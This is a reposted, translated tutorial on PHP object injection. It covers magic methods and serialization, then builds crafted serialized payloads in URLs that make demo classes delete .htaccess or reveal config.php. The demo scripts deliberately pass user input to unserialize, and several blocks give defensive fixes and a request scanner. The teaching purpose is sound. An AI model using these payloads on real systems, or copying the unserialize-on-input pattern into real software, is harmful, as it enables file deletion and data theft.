
7 months ago (09-09)  China Internet Security Response Center  PHP

0x00 Background


Original article: http://securitycafe.ro/2015/01/05/understanding-php-object-injection/

PHP object injection is a very common vulnerability. Although this type of vulnerability is somewhat hard to exploit, it is still very dangerous. To follow this article, the reader needs basic PHP knowledge.

0x01 Vulnerability cases


If you think this is a minor vulnerability, take a look at the list below of systems in which it has been found during audits; you will notice they are all well-known names (abroad, at least):

WordPress 3.6.1

Magento 1.9.0.1

Joomla 3.0.3

Ip board 3.3.5

Besides these there is a whole pile of other systems, and it is quite likely that these and other PHP applications still contain many vulnerabilities of this type, so consider sitting down with a cup of coffee and trying to understand this article.

0x01 PHP classes and objects


Classes and variables are easy PHP concepts to understand. For example, the code below defines one variable and one method inside a class.

#!php
<?php
class TestClass
{
    // A variable
    public $variable = 'This is a string';

    // A simple method
    public function PrintVariable()
    {
        echo $this->variable;
    }
}

// Create an object
$object = new TestClass();

// Call a method
$object->PrintVariable();
?>

It creates an object and calls the PrintVariable method, which outputs the variable `variable`.

If you want to learn more about object-oriented programming in PHP, see: http://php.net/manual/zh/language.oop5.php

0x02 PHP magic methods


PHP classes may contain special functions called magic functions. Magic function names begin with "__", for example __construct, __destruct, __toString, __sleep, __wakeup and a few others.

These functions are called automatically in certain situations, for example:

__construct is called when an object is created (constructor)

__destruct is called when an object is destroyed (destructor)

__toString is called when an object is used as a string

To better understand how magic methods work, let's add some magic methods to our class.

#!php
<?php
class TestClass
{
    // A variable
    public $variable = 'This is a string';

    // A simple method
    public function PrintVariable()
    {
        echo $this->variable . '<br />';
    }

    // Constructor
    public function __construct()
    {
        echo '__construct <br />';
    }

    // Destructor
    public function __destruct()
    {
        echo '__destruct <br />';
    }

    // Call
    public function __toString()
    {
        return '__toString<br />';
    }
}

// Create an object
// __construct will be called

$object = new TestClass();

// Call a method
// 'This is a string' will be output

$object->PrintVariable();
// The object is used as a string
// __toString will be called

echo $object;

// End of PHP script: __destruct will be called

?>

We put three magic methods in there: __construct, __destruct and __toString. As you can see, __construct is called when the object is created, __destruct is called when the PHP script ends, and __toString is called when the object is used as a string.

This script outputs the following:

__construct 
This is a string 
__toString 
__destruct

This is only a simple example. If you want more examples of magic functions, follow the link below:

http://php.net/manual/zh/language.oop5.magic.php

0x03 PHP object serialization


PHP allows an object to be saved for later reuse; this process is called serialization. For example, you could save an object containing user information so it can be reused later.

To serialize an object you call the "serialize" function, which returns a string. When you need the object again, you use "unserialize" to rebuild it.

Let's put that example through serialize and see what the serialized form looks like.

#!php
<?php
// A class
class User
{
    // Class data
    public $age = 0;
    public $name = '';

    // Print data
    public function PrintData()
    {
        echo 'User ' . $this->name . ' is ' . $this->age
             . ' years old. <br />';
    }
}

// Create an object
$usr = new User();

// Set data
$usr->age = 20;
$usr->name = 'John';
// Print data
$usr->PrintData();
// Print the serialized data
echo serialize($usr);
?>

It outputs:

User John is 20 years old. 
O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"John";}

You can see that the serialized data contains 20 and John; there is nothing from the class definition in it, only the object's data has been serialized.

To use the object again, we rebuild it with unserialize.

#!php
<?php
// A class
class User
{
    // Class data
    public $age = 0;
    public $name = '';

    // Print data
    public function PrintData()
    {
        echo 'User ' . $this->name . ' is ' . $this->age . ' years old. <br />';
    }
}

// Rebuild the object
$usr = unserialize('O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"John";}');

// Call PrintData to print the data
$usr->PrintData();
?>

This outputs:

User John is 20 years old

0x04 Serialization magic functions


The magic functions constructor (__construct) and destructor (__destruct) are called automatically when an object is created or destroyed; some other magic functions are called when an object is serialized or unserialized.

The __sleep magic method is called when an object is serialized. The __wakeup magic method is called when an object is unserialized.

Note that __sleep must return an array with the names of the variables to serialize.

#!php
<?php
class Test
{
    public $variable = 'BUZZ';
    public $variable2 = 'OTHER';

    public function PrintVariable()
    {
        echo $this->variable . '<br />';
    }

    public function __construct()
    {
        echo '__construct<br />';
    }

    public function __destruct()
    {
        echo '__destruct<br />';
    }

    public function __wakeup()
    {
        echo '__wakeup<br />';
    }

    public function __sleep()
    {
        echo '__sleep<br />';
        return array('variable', 'variable2');
    }
}

// Create an object; __construct is called
$obj = new Test();

// Serialize the object; __sleep is called
$serialized = serialize($obj);

// Print the serialized string
print 'Serialized: ' . $serialized . '<br />';
// Rebuild the object; __wakeup is called
$obj2 = unserialize($serialized);

// Call PrintVariable; it prints the data (BUZZ)
$obj2->PrintVariable();
// The PHP script ends; __destruct is called
?>

This outputs:

__construct 
__sleep 
Serialized: O:4:"Test":2:{s:8:"variable";s:4:"BUZZ";s:9:"variable2";s:5:"OTHER";} 
__wakeup 
BUZZ 
__destruct 
__destruct

As you can see, we created an object and serialized it (so __sleep was called), then created a second object by rebuilding it from the serialized string (so __wakeup was called), and when the PHP script ended the __destruct of both objects was called.

More on this:

http://php.net/manual/zh/language.oop5.serialization.php
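Because __wakeup runs on whatever property values the serialized string carries, it is also the last place where a class can refuse to be restored from data it did not write. The following is an added example (not code from the original article): a hypothetical SessionToken class whose __wakeup re-validates the restored properties, together with a restoreToken helper that restricts unserialize to that one class via the allowed_classes option (PHP 7.0+). It assumes PHP 7.1 or later for the nullable return type; the class, its properties and the sample strings are constructed for this example.

```php
<?php
// Added example, not from the original article: a class that validates the
// state restored by unserialize(). Class and property names are hypothetical.

class SessionToken
{
    public $userId = 0;
    public $expires = 0;

    public function __construct(int $userId, int $expires)
    {
        $this->userId = $userId;
        $this->expires = $expires;
    }

    // Only these two properties are written out by serialize().
    public function __sleep()
    {
        return array('userId', 'expires');
    }

    // Called by unserialize(): reject an object whose data is not what we would
    // have written. Throwing here aborts the restore before the object is used.
    public function __wakeup()
    {
        if (!is_int($this->userId) || $this->userId <= 0) {
            throw new UnexpectedValueException('SessionToken: invalid userId');
        }
        if (!is_int($this->expires) || $this->expires < 0) {
            throw new UnexpectedValueException('SessionToken: invalid expires');
        }
    }
}

// Restore a token; returns null instead of an object when anything is off.
// allowed_classes limits which classes unserialize() may instantiate, so a
// string naming any other class yields __PHP_Incomplete_Class and no magic
// method of that other class ever runs.
function restoreToken(string $serialized): ?SessionToken
{
    try {
        $obj = @unserialize($serialized, array('allowed_classes' => array('SessionToken')));
    } catch (UnexpectedValueException $e) {
        return null;
    }
    return $obj instanceof SessionToken ? $obj : null;
}

// Constructed inputs: a genuine round-trip and a hand-edited string in which
// userId has become a string and expires is negative.
$good     = serialize(new SessionToken(42, 1700000000));
$tampered = 'O:12:"SessionToken":2:{s:6:"userId";s:4:"abcd";s:7:"expires";i:-1;}';

var_dump(restoreToken($good) !== null);     // bool(true)
var_dump(restoreToken($tampered) === null); // bool(true): __wakeup threw
```

The validation in __wakeup is a second line of defence only; the object is still created before __wakeup runs, so the primary control remains not passing untrusted strings to unserialize at all.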

0x05 PHP object injection


Now that we understand how serialization works, how can we exploit it? In fact there are many possibilities; it all depends on the application's flow, the classes available, and the magic functions.

Remember that the values inside a serialized object are controllable.

You might get hold of the source code of a web application in which some class's __wakeup or __destruct, or some other assorted function, affects the application.

For example, we might find a class that temporarily stores log data in a file, and when __destruct is called the log file is deleted. The code looks like this.

#!php
<?php 

class LogFile
{
    // Log file name
    public $filename = 'error.log';

    // Some code that stores log data in the file
    public function LogData($text)
    {
        echo 'Log some data: ' . $text . '<br />';
        file_put_contents($this->filename, $text, FILE_APPEND);
    }

    // Destructor: deletes the log file
    public function __destruct()
    {
        echo '__destruct deletes "' . $this->filename . '" file. <br />';
        unlink(dirname(__FILE__) . '/' . $this->filename);
    }
}
?>

An example of how this class is used:

#!php
<?php
include 'logfile.php';

// Create an object
$obj = new LogFile();

// Set the file name and the log data to store
$obj->filename = 'somefile.log';
$obj->LogData('Test');

// The PHP script ends, __destruct is called, and somefile.log is deleted.

?>

In another script, we might happen to find a call to "unserialize" whose argument happens to be user-controlled, say something taken from $_GET.

#!php
<?php
include 'logfile.php';

// ... some damn code and the LogFile class ...
// Simple class definition
class User
{
    // Class data
    public $age = 0;
    public $name = '';

    // Print data
    public function PrintData()
    {
        echo 'User ' . $this->name . ' is ' . $this->age . ' years old. <br />';
    }
}

// Rebuild the object from user input
$usr = unserialize($_GET['usr_serialized']);
?>

Look: this code includes the "LogFile" class, and there is an "unserialize" call that we can inject into.

So we construct something like this:

script.php?usr_serialized=O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"John";}

So what happens? Because the input is controllable, we can construct any serialized object we like, for example:

#!php
<?php
$obj = new LogFile();
$obj->filename = '.htaccess';
echo serialize($obj) . '<br />';
?>

This outputs:

O:7:"LogFile":1:{s:8:"filename";s:9:".htaccess";} 
__destruct deletes ".htaccess" file.

Now we send the crafted serialized object to the earlier script:

script.php?usr_serialized=O:7:"LogFile":1:{s:8:"filename";s:9:".htaccess";}

This outputs:

__destruct deletes ".htaccess" file.

Now .htaccess is gone, because __destruct is called when the script ends. We can already control the variables of the "LogFile" class.

This is where the vulnerability gets its name: a serialized object is injected wherever a controllable variable is passed to unserialize, leading to code execution or other nasty behaviour.

Although this is not a great example, I believe you can grasp the concept: unserialize automatically calls __wakeup and __destruct, and an attacker who controls the class variables can then attack the web application.
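From the defender's side, the payloads in this section have a recognisable shape: a serialized PHP object always begins with an `O:<length>:"<ClassName>":` token. The following is an added example (not code from the original article) of a request-side check that walks request parameters, flags values carrying such tokens, and names the class they would instantiate, so the request can be logged or blocked before it reaches any unserialize call. The function names and the sample request array are constructed for this example.

```php
<?php
// Added example, not from the original article: detect serialized PHP objects
// in request parameters. Function names and the sample request are constructed.

// Return the class names of any object tokens (O:len:"Name" or C:len:"Name")
// found in a value. The declared length must match the name, which is what
// unserialize() itself requires, so this filters most false positives.
function findSerializedClasses(string $value): array
{
    $classes = array();
    if (preg_match_all('/(?:^|[;{])([OC]):(\d+):"([^"]*)":/', $value, $m, PREG_SET_ORDER)) {
        foreach ($m as $match) {
            if ((int)$match[2] === strlen($match[3])) {
                $classes[] = $match[3];
            }
        }
    }
    return array_values(array_unique($classes));
}

// Walk a request array (nested arrays included) and report suspicious parameters.
function scanRequest(array $params, string $prefix = ''): array
{
    $findings = array();
    foreach ($params as $key => $value) {
        $name = $prefix === '' ? (string)$key : $prefix . '[' . $key . ']';
        if (is_array($value)) {
            $findings = array_merge($findings, scanRequest($value, $name));
            continue;
        }
        $classes = findSerializedClasses((string)$value);
        if ($classes !== array()) {
            $findings[] = array('param' => $name, 'classes' => $classes);
        }
    }
    return $findings;
}

// Constructed sample request (what $_GET or $_POST might hold): one harmless
// value, the User object from the article, and a LogFile object in a nested key.
$sample = array(
    'page'           => 'home',
    'usr_serialized' => 'O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"John";}',
    'data'           => array('x' => 'O:7:"LogFile":1:{s:8:"filename";s:9:".htaccess";}'),
);

foreach (scanRequest($sample) as $f) {
    error_log('possible PHP object injection in ' . $f['param'] . ': ' . implode(',', $f['classes']));
}
// Logs two findings: usr_serialized -> User, data[x] -> LogFile
```

A check like this belongs in a request filter or a WAF rule, and the class names it reports are useful in the alert: a request naming a class that was never meant to be unserialized from the client (LogFile here) is a much stronger signal than one naming the expected User class.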

0x06 Common injection points


Leaving __wakeup and __destruct aside, there are other very common injection points that let you exploit this type of vulnerability; it all depends on the application logic.

For example, a User class might define a __toString so that the application can output the object as a string (echo $obj), while another class might define a __toString that reads a file.

#!php
<?php 
// ... some includes ...
class FileClass
{
    // File name
    public $filename = 'error.log';

    // When the object is used as a string, this file is read
    public function __toString()
    {
        return file_get_contents($this->filename);
    }
}

// Main User class
class User
{
    // Class data
    public $age = 0;
    public $name = '';

    // Allows the object to be output as a string with the data above
    public function __toString()
    {
        return 'User ' . $this->name . ' is ' . $this->age . ' years old. <br />';
    }
}

// User-controlled
$obj = unserialize($_GET['usr_serialized']);

// Output via __toString
echo $obj;

?>

So we construct the URL:

script.php?usr_serialized=O:4:"User":2:{s:3:"age";i:20;s:4:"name";s:4:"John";}

Now think again: what if we serialize a FileClass instead?

We create the exploit code:

#!php
<?php
$fileobj = new FileClass();
$fileobj->filename = 'config.php';
echo serialize($fileobj);

?>

Then we inject the generated payload into the URL:

script.php?usr_serialized=O:9:"FileClass":1:{s:8:"filename";s:10:"config.php";}

The page then outputs the source code of config.php:

#!php
<?php
     $private_data = 'MAGIC';
?>

PS: I hope this helps you understand.

0x07 Other exploitation methods


Other magic functions may also offer exploitation points: for example __call is invoked when an object calls a method that does not exist, and __get and __set are invoked when an object tries to access a property that does not exist, and so on.

Note, however, that exploitation is not limited to magic functions; there are also ways to exploit this vulnerability through ordinary functions. For example, a module might define a function called get that performs some sensitive operation, such as a database access, which could lead to SQL injection, depending on what the function itself does.

The only technical difficulty is that the injected class must be available at the injection point, although some modules or scripts use the "autoload" feature, which you can read about here:

http://php.net/manual/zh/language.oop5.autoload.php

PS: go read the damn code.

0x08 How to fix or avoid this vulnerability


Never use "unserialize" on anything user-controlled; consider "json_decode" instead.
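To make that advice concrete, here is an added example (not code from the original article) that places the unsafe pattern from section 0x05 beside two safer ways of accepting the same user profile data: json_decode with field-by-field validation for new code, and, for legacy code that must keep the serialize() format, an HMAC over the payload plus `allowed_classes => false` (PHP 7.0+) so that no application class can be instantiated from the string. The function names, the key constant and the sample inputs are constructed for this example; the secret is a placeholder.

```php
<?php
// Added example, not from the original article. Function names, the key
// constant and the sample inputs are constructed; the secret is a placeholder.

// UNSAFE (the article's pattern): whatever class name the string carries is
// instantiated, and its __wakeup()/__destruct() run with attacker-chosen
// property values.
function loadUserProfileUnsafe(string $input)
{
    return unserialize($input);
}

// SAFER 1: json_decode() yields only arrays and scalars, never objects of
// application classes, so no magic method can fire. The decoded data is still
// untrusted input and is validated field by field before use.
function loadUserProfileJson(string $input): ?array
{
    $data = json_decode($input, true, 4);   // associative arrays, shallow nesting only
    if (!is_array($data)) {
        return null;
    }
    if (!isset($data['age'], $data['name']) || !is_int($data['age']) || !is_string($data['name'])) {
        return null;
    }
    if ($data['age'] < 0 || $data['age'] > 150 || strlen($data['name']) > 64) {
        return null;
    }
    return array('age' => $data['age'], 'name' => $data['name']);
}

// SAFER 2 (legacy code that must keep the serialize() format): accept the
// payload only if it carries an HMAC made with a server-side secret, so a
// client cannot craft it, and pass allowed_classes=false so that even if the
// HMAC layer were ever bypassed, any object token becomes
// __PHP_Incomplete_Class and no magic method runs.
const PROFILE_HMAC_KEY = 'replace-with-a-random-secret';   // placeholder value

function sealProfile(array $profile): string
{
    $payload = serialize($profile);
    return hash_hmac('sha256', $payload, PROFILE_HMAC_KEY) . '.' . base64_encode($payload);
}

function loadUserProfileSealed(string $input): ?array
{
    $parts = explode('.', $input, 2);
    if (count($parts) !== 2) {
        return null;
    }
    $payload = base64_decode($parts[1], true);
    if ($payload === false || !hash_equals(hash_hmac('sha256', $payload, PROFILE_HMAC_KEY), $parts[0])) {
        return null;                        // tampered, or not produced by us
    }
    $data = unserialize($payload, array('allowed_classes' => false));
    return is_array($data) ? $data : null;
}

// Constructed inputs: a JSON profile, a sealed profile, and a forged blob that
// wraps the article's LogFile payload under a bogus MAC.
$json   = '{"age":20,"name":"John"}';
$sealed = sealProfile(array('age' => 20, 'name' => 'John'));
$forged = 'deadbeef.' . base64_encode('O:7:"LogFile":1:{s:8:"filename";s:9:".htaccess";}');

var_dump(loadUserProfileJson($json));              // array with age 20 and name "John"
var_dump(loadUserProfileSealed($sealed) !== null); // bool(true)
var_dump(loadUserProfileSealed($forged));          // NULL: MAC mismatch, nothing is unserialized
```

hash_equals is used for the MAC comparison so that the check runs in constant time, and the MAC is verified before unserialize is ever reached; allowed_classes=false is the safety net, not the primary control.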

0x09 Conclusion


Although it is hard to find and hard to exploit, this really is very serious and can lead to all kinds of vulnerabilities.



Unless otherwise noted, all articles on this site are original to 铁匠运维网; when reposting, please credit the source: http://iosdelisi.com/24932.html
